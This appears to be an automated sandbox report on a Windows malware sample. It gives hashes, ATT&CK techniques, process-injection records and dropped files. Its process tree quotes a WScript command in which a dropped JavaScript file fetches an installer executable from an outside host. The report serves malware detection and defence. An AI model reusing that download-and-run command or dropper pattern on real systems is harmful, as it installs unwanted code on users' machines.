97bce5dab15c95df4de4c5bd7f36770552cec7c62a79ca296fa09b5e5d1810b9

Analysis

max time kernel
118s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
12/10/2024, 20:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe
Size

184KB
MD5

3be434a7cdd3d4d5094d65bee879f47d
SHA1

6b39bcfb1b7547a047b9fdffb146fab851c33044
SHA256

97bce5dab15c95df4de4c5bd7f36770552cec7c62a79ca296fa09b5e5d1810b9
SHA512

b483ab3693449ac06822b9f338d5f7a7921c307e5915a6546dd134e65dc15cc159e842fc8759689fce0155a6de2a29e18e8c516a4e12ca928ebc37e14a5fccaa
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3y:/7BSH8zUB+nGESaaRvoB7FJNndnv

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2780	WScript.exe
8	2780	WScript.exe
10	2780	WScript.exe
12	2036	WScript.exe
13	2036	WScript.exe
15	668	WScript.exe
16	668	WScript.exe
18	2004	WScript.exe
19	2004	WScript.exe
21	2364	WScript.exe
22	2364	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2656 wrote to memory of 2780	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	30
PID 2656 wrote to memory of 2780	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	30
PID 2656 wrote to memory of 2780	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	30
PID 2656 wrote to memory of 2780	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	30
PID 2656 wrote to memory of 2036	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	32
PID 2656 wrote to memory of 2036	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	32
PID 2656 wrote to memory of 2036	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	32
PID 2656 wrote to memory of 2036	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	32
PID 2656 wrote to memory of 668	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	34
PID 2656 wrote to memory of 668	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	34
PID 2656 wrote to memory of 668	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	34
PID 2656 wrote to memory of 668	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	34
PID 2656 wrote to memory of 2004	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	36
PID 2656 wrote to memory of 2004	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	36
PID 2656 wrote to memory of 2004	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	36
PID 2656 wrote to memory of 2004	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	36
PID 2656 wrote to memory of 2364	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	38
PID 2656 wrote to memory of 2364	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	38
PID 2656 wrote to memory of 2364	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	38
PID 2656 wrote to memory of 2364	2656	3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\3be434a7cdd3d4d5094d65bee879f47d_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2656
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1B1F.js" http://www.djapp.info/?domain=fGqlmhkTuz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1B1F.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2780
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1B1F.js" http://www.djapp.info/?domain=fGqlmhkTuz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1B1F.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2036
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1B1F.js" http://www.djapp.info/?domain=fGqlmhkTuz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1B1F.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:668
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1B1F.js" http://www.djapp.info/?domain=fGqlmhkTuz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1B1F.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2004
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1B1F.js" http://www.djapp.info/?domain=fGqlmhkTuz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1B1F.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
35ce3db639d9a143bc2f265815e02b62

SHA1
f4ddbebd371018f93999e56d2533640469e5caec

SHA256
0b20e0fdda7d726a06222955d814eaf081373685a098b146a7c5ed90f05b1895

SHA512
8e135979baffc5dbdaa8ddd4d58f42e8dd42f40541f7e35db41b181766b9837f18877bc0e7e9f00e854bd06e7f3ec935ffd4eb03e0486c00e19cc610e15c85af

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
cc6a0efa723b48c290e9f1c35f630d1b

SHA1
3ec818e499458062bfa6f206b271eaf78ad1f677

SHA256
dd850d3f08b8e185c298c62fef07ba148a51dace59bbdd9c5780033ab10ce4a6

SHA512
4f530c4ed41646f5ec1588556d7b57ffec14fcc8e5dcc23e384f5d7036ce724edf9c3e501d1a567e5e9119c7dc011192e9bcf5f50b4960ef01be1d585cb29583

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
90e90eb6931822aae220a7ffddd5b1b9

SHA1
7dc1c21db9f307826208dde374d8f24a12943760

SHA256
810de66f118bf87e9698067c341ff01b78779a7ecd9a296e7c26f9d31089e75e

SHA512
a372845706e3c944093f60474d2d2e3b5a6f55158fc1c4a7d439658dc2b1b2d906ec4a0123ef87e0e487cea0bdc37c5dd4b9fde81ddbb3fb235425b968d09a46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0I0VVMWQ\domain_profile[1].htm

Filesize
40KB

MD5
b058e84973fdc4b7f4ebfbf0a47f9866

SHA1
f4abe769831af46d85cf7aefce22657d54eec4c5

SHA256
854144fa157eeb2ddb0ad2817241227e4819a1e0e5a57a17c9c295c8c9b0b0d8

SHA512
e528f5b785cece3bde84dab37dcb762ca71219bda0551c08684d31ce228c4d1c3b958929ed29e0828b14067d92d0fee9402d4e37edff682607ffa92103a57ae1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0I0VVMWQ\domain_profile[1].htm

Filesize
40KB

MD5
60c9a137d51692af6069c6a669ae6ffc

SHA1
9bf3e188190b2ca4dc50e68e7654b8dc53ba32c6

SHA256
984299106c2950c560b136e670fe15054a30470f34ebe532317f2e9365f82385

SHA512
610a4a0747c024c1e2fe7b1345792e72f3f84082d5c3675be17e9895e8cfbcd6367efc8dcf60050c2800a6cb164138a573c84bf587f36833f5589334102e380e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\domain_profile[1].htm

Filesize
40KB

MD5
f01c73dfc08939493ff4c29526e92aa3

SHA1
5874076c53bfbe6761e9c80d80fb6495a54cab58

SHA256
b80c8c547ec067b48342c4c72b39f5c7632f396a3b033df9d3b5c5c87c407164

SHA512
a9c03bc1eb0e8b6f5fb15a18495f855aa1eec0447d7c65111a5e133c850b895260c380c4b37d0d24232e398a3ca3acec98cfd6e4e1f910bf718ff0584272f6b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\domain_profile[1].htm

Filesize
6KB

MD5
d06ed621ed6015be21f798ddcf44207d

SHA1
5f2f6ae1f85fe1a94a02edba89646808f3c07e38

SHA256
a04355d0dd442bbc1aec52f05f04438d40f0b743092ae3d64cfd0f32c85275d4

SHA512
dde875bf16121736c23ae3831c28aea7564a4fefb844aa0faabdc6e4a7ddad353771e585ce28749fefc6e8350043d496fcda6fd9f88823b88278a2d0867358a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4A97.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6308.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf1B1F.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\VGXF79Y6.txt

Filesize
177B

MD5
726a4187f9ad484dd8f01ee537d36747

SHA1
ed7aac1b677ac91959cccb02f2a2c92c483cf481

SHA256
2a39749f4d0f36021a7e13cc83555d61c5c8f9c1dde961efbdce66404e0cdb7a

SHA512
6f44e0a4aa57dd60b3c038f60c143d286fadefbb09d42777e0e483e8f258681fbbdee27492e22d03b2f209ff0e160807e3eda1174e210b28e0689f78eb297697

Download Submit